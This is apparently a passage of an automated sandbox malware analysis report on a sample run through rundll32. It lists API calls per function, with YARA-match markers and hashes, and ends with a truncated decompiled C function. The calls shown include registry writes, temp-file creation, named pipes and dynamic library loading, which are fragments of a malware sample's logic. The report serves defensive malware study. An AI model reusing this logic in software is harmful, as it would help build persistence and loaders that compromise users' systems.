                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Process$CloseErrorHandleLastMultipleObjectsWaitlstrlen$CodeCreateExitTerminatembstowcsmemsetwcstombs
                                            • String ID: D
                                            • API String ID: 2463014471-2746444292
                                            • Opcode ID: fe732e46dfd72efed87d9d686d5c0a2f155b77d4c78888b46144f6ef68cd6833
                                            • Instruction ID: bbc57575bb6279f42748418fd3310406e24d07b546d228bf31b7109bd248e865
                                            • Opcode Fuzzy Hash: fe732e46dfd72efed87d9d686d5c0a2f155b77d4c78888b46144f6ef68cd6833
                                            • Instruction Fuzzy Hash: D4411A72A01218BFDF51EFA4CD859AEBFBDFB08205F105069F901B2190EA319E448B61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • StrChrA.SHLWAPI(?,0000002C), ref: 0580AE99
                                            • StrTrimA.SHLWAPI(00000001,?), ref: 0580AEB2
                                            • StrChrA.SHLWAPI(?,0000002C), ref: 0580AEBD
                                            • StrTrimA.SHLWAPI(00000001,?), ref: 0580AED6
                                            • lstrlen.KERNEL32(?,00000001,?,?), ref: 0580AF6E
                                            • RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 0580AF90
                                            • lstrcpy.KERNEL32(00000020,?), ref: 0580AFAF
                                            • lstrlen.KERNEL32(?), ref: 0580AFB9
                                            • memcpy.NTDLL(?,?,?), ref: 0580AFFA
                                            • memcpy.NTDLL(?,?,?), ref: 0580B00D
                                            • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 0580B031
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 0580B050
                                            • HeapFree.KERNEL32(00000000,?,00000001,?,?), ref: 0580B076
                                            • HeapFree.KERNEL32(00000000,00000001,00000001,?,?), ref: 0580B092
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                            • String ID:
                                            • API String ID: 3323474148-0
                                            • Opcode ID: 087882c0caf7233365698a6b76104e02708a3d8aa11f145b2f5b305b5f966b25
                                            • Instruction ID: 56b68f5f9c397b821fa925764447018ca0c449acfca7e0ab6d67586961da60ed
                                            • Opcode Fuzzy Hash: 087882c0caf7233365698a6b76104e02708a3d8aa11f145b2f5b305b5f966b25
                                            • Instruction Fuzzy Hash: 1E717C71508345AFDB61DF29CC45A5BBFE9BB48304F04892EFD9AD3290D731E9848B92
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(?), ref: 0580CB91
                                            • lstrlen.KERNEL32(?), ref: 0580CB98
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580CBAF
                                            • lstrcpy.KERNEL32(00000000,?), ref: 0580CBC0
                                            • lstrcat.KERNEL32(?,?), ref: 0580CBDC
                                            • lstrcat.KERNEL32(?,?), ref: 0580CBED
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580CBFE
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 0580CC9B
                                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0580CCD4
                                            • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 0580CCED
                                            • CloseHandle.KERNEL32(00000000), ref: 0580CCF7
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580CD07
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0580CD20
                                            • HeapFree.KERNEL32(00000000,?), ref: 0580CD30
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$AllocateFree$Filelstrcatlstrlen$CloseCreateHandleWritelstrcpy
                                            • String ID:
                                            • API String ID: 333890978-0
                                            • Opcode ID: 84fd823f538d558bbdecc17d4a45a007c442b12a2acd2b04a1a753869e1c728b
                                            • Instruction ID: 8540429bfed0c0ab322971cca5b01b6794b3fe4aa8966160da201fa718f7b74f
                                            • Opcode Fuzzy Hash: 84fd823f538d558bbdecc17d4a45a007c442b12a2acd2b04a1a753869e1c728b
                                            • Instruction Fuzzy Hash: DE516C76410108BFDF219FA4DC85CAEBFBDFF48254B158426FE0697160DA31AD868F61
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • wsprintfA.USER32 ref: 05807651
                                            • OpenWaitableTimerA.KERNEL32(00100000,00000000,?), ref: 05807664
                                            • CloseHandle.KERNEL32(00000000), ref: 0580777C
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • memset.NTDLL ref: 05807687
                                            • memcpy.NTDLL(?,000493E0,00000010,?,?,00000040), ref: 05807706
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 0580771B
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 05807733
                                            • GetLastError.KERNEL32(0581BC40,?,?,?,?,?,?,?,00000040), ref: 0580774B
                                            • RtlEnterCriticalSection.NTDLL(?), ref: 05807757
                                            • RtlLeaveCriticalSection.NTDLL(?), ref: 05807766
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$AllocateCloseErrorHandleHeapLastOpenTimerWaitablememcpymemsetwsprintf
                                            • String ID: 0x%08X$W
                                            • API String ID: 1559661116-2600449260
                                            • Opcode ID: 6805654382146b4b08ef50c424501d40c9b9a99773a2b892e0c4925cac653a8c
                                            • Instruction ID: cd0637c703361a13fa9dff53a869951c9410eccf6c815e02888f50e16480a25e
                                            • Opcode Fuzzy Hash: 6805654382146b4b08ef50c424501d40c9b9a99773a2b892e0c4925cac653a8c
                                            • Instruction Fuzzy Hash: 7D415DB5900309AFDB60DFA4C885AAABFF8FF08344F108529F959D7290D770AA54CF91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(?,00000000,?,?,?,0580CE9C,?,?), ref: 05810F1E
                                              • Part of subcall function 05811C01: RtlAllocateHeap.NTDLL(00000000,00000001,05821A23), ref: 05811C0D
                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0580CE9C,?,?), ref: 05810F47
                                            • lstrcpyW.KERNEL32(-0000FFFE,?), ref: 05810F67
                                            • lstrcpyW.KERNEL32(-00000002,?), ref: 05810F83
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0580CE9C,?,?), ref: 05810F8F
                                            • LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0580CE9C,?,?), ref: 05810F92
                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0580CE9C,?,?), ref: 05810F9E
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05810FBB
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05810FD5
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05810FEB
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05811001
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 05811017
                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0581102D
                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,0580CE9C,?,?), ref: 05811056
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AddressProc$CurrentDirectory$Librarylstrcpy$AllocateFreeHeapLoadlstrlen
                                            • String ID:
                                            • API String ID: 3772355505-0
                                            • Opcode ID: b1c31e7a69648bfd58783b933e69861dc659970d07665ebb29913e36aff3bbe6
                                            • Instruction ID: ec0d0ca4aba8b684f68af4b6c399d9805b72d9341f8ced9e7e5a84bbd598f913
                                            • Opcode Fuzzy Hash: b1c31e7a69648bfd58783b933e69861dc659970d07665ebb29913e36aff3bbe6
                                            • Instruction Fuzzy Hash: 52310CB161520AAFEB20AF65DC899667FECEF04355B048426FD06C7251DB36EC44CB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlenW.KERNEL32(?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804D3F
                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804D4A
                                            • lstrlenW.KERNEL32(?,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804D52
                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 05804D67
                                            • lstrcpyW.KERNEL32(00000000,?), ref: 05804D78
                                            • lstrcatW.KERNEL32(00000000,?), ref: 05804D8A
                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804D8F
                                            • lstrcatW.KERNEL32(00000000,058243E0), ref: 05804D9B
                                            • lstrcatW.KERNEL32(00000000), ref: 05804DA4
                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804DA9
                                            • lstrcatW.KERNEL32(00000000,058243E0), ref: 05804DB5
                                            • lstrcatW.KERNEL32(00000000,00000002), ref: 05804DD1
                                            • CopyFileW.KERNEL32(?,00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804DD9
                                            • HeapFree.KERNEL32(00000000,00000000,?,?,0000005C,?,?,00000000,?,?,?,0580DD96,?,?,?), ref: 05804DE7
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrcat$lstrlen$CreateDirectoryHeap$AllocateCopyFileFreelstrcpy
                                            • String ID:
                                            • API String ID: 3635185113-0
                                            • Opcode ID: 9f17812794751fee904c00263838a9e2ed8b9e55556b9bdb03b80103feccd9f8
                                            • Instruction ID: bb7d54af529b500ff5100dc7a2bb50ed59230ca13a80edc13456e1e3ffbf5088
                                            • Opcode Fuzzy Hash: 9f17812794751fee904c00263838a9e2ed8b9e55556b9bdb03b80103feccd9f8
                                            • Instruction Fuzzy Hash: 6321C232251215BFDA716B64EC86E7FBFB8EF85B54F01401EFE0592160CF20AC469A76
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC12
                                            • TlsAlloc.KERNEL32 ref: 0580BC1C
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC45
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC53
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC61
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC6F
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC7D
                                            • LoadLibraryA.KERNEL32(?), ref: 0580BC8B
                                            • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 0580BCB5
                                            • HeapFree.KERNEL32(00000000,?,?,?,0000000C,00000000), ref: 0580BD36
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load$Library$AllocDll@4FreeHeapImports
                                            • String ID: ~
                                            • API String ID: 1792504554-1707062198
                                            • Opcode ID: 9cd3aba8f1c788ddddce8f7ac3251b4d53008164070f1ca86ff252f9a7553e25
                                            • Instruction ID: 25d8f99ed810a3b2f815e9ef5bcac9e8334151e8fb44771055c196f73a86398f
                                            • Opcode Fuzzy Hash: 9cd3aba8f1c788ddddce8f7ac3251b4d53008164070f1ca86ff252f9a7553e25
                                            • Instruction Fuzzy Hash: 2F417C71A10218AFDB60EFA9D88ADAD7FE9BB08210F148466ED05D7240CA79AD85CB10
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 0580984B: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05809890
                                              • Part of subcall function 0580984B: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 058098A8
                                              • Part of subcall function 0580984B: WaitForSingleObject.KERNEL32(00000000,?,00000000,?), ref: 05809970
                                              • Part of subcall function 0580984B: HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 05809999
                                              • Part of subcall function 0580984B: HeapFree.KERNEL32(00000000,?,?,00000000,?), ref: 058099A9
                                              • Part of subcall function 0580984B: RegCloseKey.ADVAPI32(?,?,00000000,?), ref: 058099B2
                                            • lstrcmp.KERNEL32(?,?), ref: 0581B2D9
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581B305
                                            • GetCurrentThreadId.KERNEL32 ref: 0581B3B6
                                            • GetCurrentThread.KERNEL32 ref: 0581B3C7
                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,Function_0000121A,?,00000001), ref: 0581B404
                                            • HeapFree.KERNEL32(00000000,?,?,00000000,?,Function_0000121A,?,00000001), ref: 0581B418
                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0581B426
                                            • wsprintfA.USER32 ref: 0581B43E
                                              • Part of subcall function 05815B7E: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,05814325,00000000,00000000,00000000,00000000,00000000,?,0580479A,00000000,00000000,00000000,00000000), ref: 05815B88
                                              • Part of subcall function 05815B7E: lstrcpy.KERNEL32(00000000,00000000), ref: 05815BAC
                                              • Part of subcall function 05815B7E: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,0580479A,00000000,00000000,00000000,00000000), ref: 05815BB3
                                              • Part of subcall function 05815B7E: lstrcat.KERNEL32(00000000,?), ref: 05815C0A
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 0581B449
                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0581B460
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 0581B471
                                            • HeapFree.KERNEL32(00000000,?), ref: 0581B47D
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
                                            • String ID:
                                            • API String ID: 773763258-0
                                            • Opcode ID: 57459daec55b7d60a8e6dd442dfa8b8554596024886871a2187fee593f752860
                                            • Instruction ID: 9c2dda57dd0531edfa2ca881fdc62d76adf0bdd5a2d219ef9f9a8efaa087f8ad
                                            • Opcode Fuzzy Hash: 57459daec55b7d60a8e6dd442dfa8b8554596024886871a2187fee593f752860
                                            • Instruction Fuzzy Hash: 7B71EF71910219EFDB21DFA6D889DEEBFB9FB08211F008055FD05E7220DB30A995DB95
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • lstrlen.KERNEL32(00000000,76C85520,?,00000000,?,?,?), ref: 0581779B
                                            • lstrlen.KERNEL32(?), ref: 058177A3
                                            • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 058177B3
                                            • lstrcpy.KERNEL32(00000000,?), ref: 058177D2
                                            • lstrlen.KERNEL32(?), ref: 058177E7
                                            • lstrlen.KERNEL32(?), ref: 058177F5
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 05817843
                                            • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 05817867
                                            • lstrlen.KERNEL32(?), ref: 0581789A
                                            • HeapFree.KERNEL32(00000000,?,?), ref: 058178C5
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 058178DC
                                            • HeapFree.KERNEL32(00000000,?,?), ref: 058178E9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: lstrlen$Heap$Free$Allocatelstrcpy
                                            • String ID:
                                            • API String ID: 904523553-0
                                            • Opcode ID: e6cebdf1911b451bc1c2b8e9aa572732b0a3b4ee5fd0abe319557b8092479388
                                            • Instruction ID: 58e5b40de808ae0b2336cce09d56607fd1ef2ed70d1ad20f39b68e5e22c75110
                                            • Opcode Fuzzy Hash: e6cebdf1911b451bc1c2b8e9aa572732b0a3b4ee5fd0abe319557b8092479388
                                            • Instruction Fuzzy Hash: BD41597190024AABDF229FA4CC85AAE7FBAFB44310F10846AFD15D7150DB30AD51DB68
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0580C7E0
                                            • WaitForSingleObject.KERNEL32(00000598,00000000), ref: 0580C802
                                            • ConnectNamedPipe.KERNEL32(?,?), ref: 0580C822
                                            • GetLastError.KERNEL32 ref: 0580C82C
                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0580C850
                                            • FlushFileBuffers.KERNEL32(?,?,00000001,00000000,?,?,?,00000010,00000000), ref: 0580C893
                                            • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 0580C89C
                                            • WaitForSingleObject.KERNEL32(00000000), ref: 0580C8A5
                                            • CloseHandle.KERNEL32(?), ref: 0580C8BA
                                            • GetLastError.KERNEL32 ref: 0580C8C7
                                            • CloseHandle.KERNEL32(?), ref: 0580C8D4
                                            • RtlExitUserThread.NTDLL(000000FF), ref: 0580C8EA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Wait$CloseErrorHandleLastNamedObjectPipeSingle$BuffersConnectCreateDisconnectEventExitFileFlushMultipleObjectsThreadUser
                                            • String ID:
                                            • API String ID: 4053378866-0
                                            • Opcode ID: b187b0cd42604ab1af204847e808ba16c23be55b61fa8fb781d8890c9607da84
                                            • Instruction ID: 989b83594c87e7c731126a1439768b3408f0a011a25f97b75da6774994932b06
                                            • Opcode Fuzzy Hash: b187b0cd42604ab1af204847e808ba16c23be55b61fa8fb781d8890c9607da84
                                            • Instruction Fuzzy Hash: 38319171414304AFDB509F64DC8A96ABFA9FB44314F008A29FD65D21E0DB70AD458FA7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlImageNtHeader.NTDLL(?), ref: 05812047
                                            • GetTempPathA.KERNEL32(00000000,00000000,?,?,05820300,00000094,00000000,00000000,?), ref: 0581205F
                                            • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 0581206E
                                            • GetTempPathA.KERNEL32(00000001,00000000,?,?,05820300,00000094,00000000,00000000,?), ref: 05812081
                                            • GetTickCount.KERNEL32 ref: 05812085
                                            • wsprintfA.USER32 ref: 0581209C
                                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 058120D7
                                            • StrRChrA.SHLWAPI(00000000,00000000,?), ref: 058120F7
                                            • lstrlen.KERNEL32(00000000), ref: 05812101
                                            • RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 05812111
                                            • RegCloseKey.ADVAPI32(?), ref: 0581211D
                                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000001,00000000,?), ref: 0581212B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
                                            • String ID:
                                            • API String ID: 3778301466-0
                                            • Opcode ID: c71b80a0a67646a554ff5642abed485645eeeb87b53b050c6ec0116f3bed5f76
                                            • Instruction ID: 8efeae508cc288d76d081ed0b96f4763b0e36de02765e7ac82d75fff94dbee42
                                            • Opcode Fuzzy Hash: c71b80a0a67646a554ff5642abed485645eeeb87b53b050c6ec0116f3bed5f76
                                            • Instruction Fuzzy Hash: F9314A75511218BFDF21AFA2DC89DAF3FADEF45365B108015FD06C6110DA71AE918FA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RtlImageNtHeader.NTDLL(00000000), ref: 058115D4
                                            • GetCurrentThreadId.KERNEL32 ref: 058115EA
                                            • GetCurrentThread.KERNEL32 ref: 058115FB
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 058166CE
                                              • Part of subcall function 058166BC: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,058043E4,00000F00), ref: 058166E7
                                              • Part of subcall function 058166BC: GetCurrentThreadId.KERNEL32 ref: 058166F4
                                              • Part of subcall function 058166BC: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,058043E4,00000F00), ref: 05816700
                                              • Part of subcall function 058166BC: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,058043E4,00000F00), ref: 0581670E
                                              • Part of subcall function 058166BC: lstrcpy.KERNEL32(00000000), ref: 05816730
                                              • Part of subcall function 05814309: lstrlen.KERNEL32(00000000,00000001,00000000,?,?,00000001,00000000,00000000,00000000,00000000,?,0580479A,00000000,00000000,00000000,00000000), ref: 05814374
                                              • Part of subcall function 05814309: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000001,00000000,00000000,00000000,00000000,?,0580479A,00000000,00000000,00000000,00000000), ref: 0581439C
                                            • HeapFree.KERNEL32(00000000,?,?,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 05811675
                                            • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 05811681
                                            • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 058116D0
                                            • wsprintfA.USER32 ref: 058116E8
                                            • lstrlen.KERNEL32(00000000,00000000), ref: 058116F3
                                            • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 0581170A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                            • String ID: W
                                            • API String ID: 630447368-655174618
                                            • Opcode ID: b324613d9e3643748d30d44cc04310634ecc99f209ca34a431214fa26a27c307
                                            • Instruction ID: 8e3679779047d5149f65c01b57333c56c89dbb2b32dc4b3924beacfe6e020b48
                                            • Opcode Fuzzy Hash: b324613d9e3643748d30d44cc04310634ecc99f209ca34a431214fa26a27c307
                                            • Instruction Fuzzy Hash: 12413971A00218ABDF21DFA6DC49DAE7FB9FF14750F048015FD05D2160DB35AA90DBA9
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05803F4B
                                              • Part of subcall function 0580B0A5: RegCloseKey.ADVAPI32(?), ref: 0580B12C
                                            • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05803F86
                                            • lstrcpyW.KERNEL32(-00000002,?), ref: 05803FE8
                                            • lstrcatW.KERNEL32(00000000,?), ref: 05803FFD
                                            • lstrcpyW.KERNEL32(?), ref: 05804017
                                            • lstrcatW.KERNEL32(00000000,?), ref: 05804026
                                              • Part of subcall function 0580E793: lstrlenW.KERNEL32(?,00000000,?,05804045,00000000,?), ref: 0580E7A6
                                              • Part of subcall function 0580E793: lstrlen.KERNEL32(?,?,05804045,00000000,?), ref: 0580E7B1
                                              • Part of subcall function 0580E793: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 0580E7C6
                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 05804090
                                              • Part of subcall function 05815F3B: lstrlenW.KERNEL32(?,73E806E0,05822F1B,80000001,?,?,0580C229,?,?,058040AD,00000000,?,00000000,?), ref: 05815F47
                                              • Part of subcall function 05815F3B: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,0580C229,?,?,058040AD,00000000,?,00000000,?), ref: 05815F6F
                                              • Part of subcall function 05815F3B: memset.NTDLL ref: 05815F81
                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,?,00000000,?), ref: 058040C5
                                            • GetLastError.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000,?), ref: 058040D0
                                            • HeapFree.KERNEL32(00000000,00000000), ref: 058040E6
                                            • RegCloseKey.ADVAPI32(?,00000000,?,00000000,?), ref: 058040F8
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
                                            • String ID:
                                            • API String ID: 1430934453-0
                                            • Opcode ID: db26b2de9a2a144ebf28e9e288ecb03084e513d81d55c23746835fba43be8a63
                                            • Instruction ID: b4602430e00017fc6456487956b3cd7b0b2075d7c7499efb13875dc63cf912e1
                                            • Opcode Fuzzy Hash: db26b2de9a2a144ebf28e9e288ecb03084e513d81d55c23746835fba43be8a63
                                            • Instruction Fuzzy Hash: E5515C71910209ABEFA1EBA5DC49EAB7FBDFF44214F005115FD05E21A0DB35AE41DB60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 55%
                                            			E049F26E7(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                                            				intOrPtr _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				char _v20;
                                            				WCHAR* _v24;
                                            				signed int _v28;
                                            				intOrPtr _v32;
                                            				void* __edi;
                                            				void* __esi;
                                            				WCHAR* _t58;
                                            				signed int _t60;
                                            				signed int _t62;
                                            				intOrPtr _t64;
                                            				intOrPtr _t66;
                                            				intOrPtr _t70;
                                            				void* _t72;
                                            				void* _t75;
                                            				void* _t76;
                                            				WCHAR* _t80;
                                            				WCHAR* _t83;
                                            				void* _t84;
                                            				void* _t85;
                                            				void* _t86;
                                            				intOrPtr _t92;
                                            				signed int _t103;
                                            				void* _t104;
                                            				intOrPtr _t105;
                                            				void* _t107;
                                            				intOrPtr* _t115;
                                            				void* _t119;
                                            				WCHAR* _t125;
                                            
                                            				_t58 =  *0x49fa3dc; // 0x4f79c48
                                            				_v24 = _t58;
                                            				_v28 = 8;
                                            				_v20 = GetTickCount();
                                            				_t60 = E049F59CA();
                                            				_t103 = 5;
                                            				_t98 = _t60 % _t103 + 6;
                                            				_t62 = E049F59CA();
                                            				_t117 = _t62 % _t103 + 6;
                                            				_v32 = _t62 % _t103 + 6;
                                            				_t64 = E049F4B8D(_t60 % _t103 + 6);
                                            				_v16 = _t64;
                                            				if(_t64 != 0) {
                                            					_t66 = E049F4B8D(_t117);
                                            					_v12 = _t66;
                                            					if(_t66 != 0) {
                                            						_push(5);
                                            						_t104 = 0xa;
                                            						_t119 = E049F4480(_t104,  &_v20);
                                            						if(_t119 == 0) {
                                            							_t119 = 0x49f918c;
                                            						}
                                            						_t70 = E049F22D6(_v24);
                                            						_v8 = _t70;
                                            						if(_t70 != 0) {
                                            							_t115 = __imp__;
                                            							_t72 =  *_t115(_t119);
                                            							_t75 =  *_t115(_v8);
                                            							_t76 =  *_t115(_a4);
                                            							_t80 = E049F4DF6(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
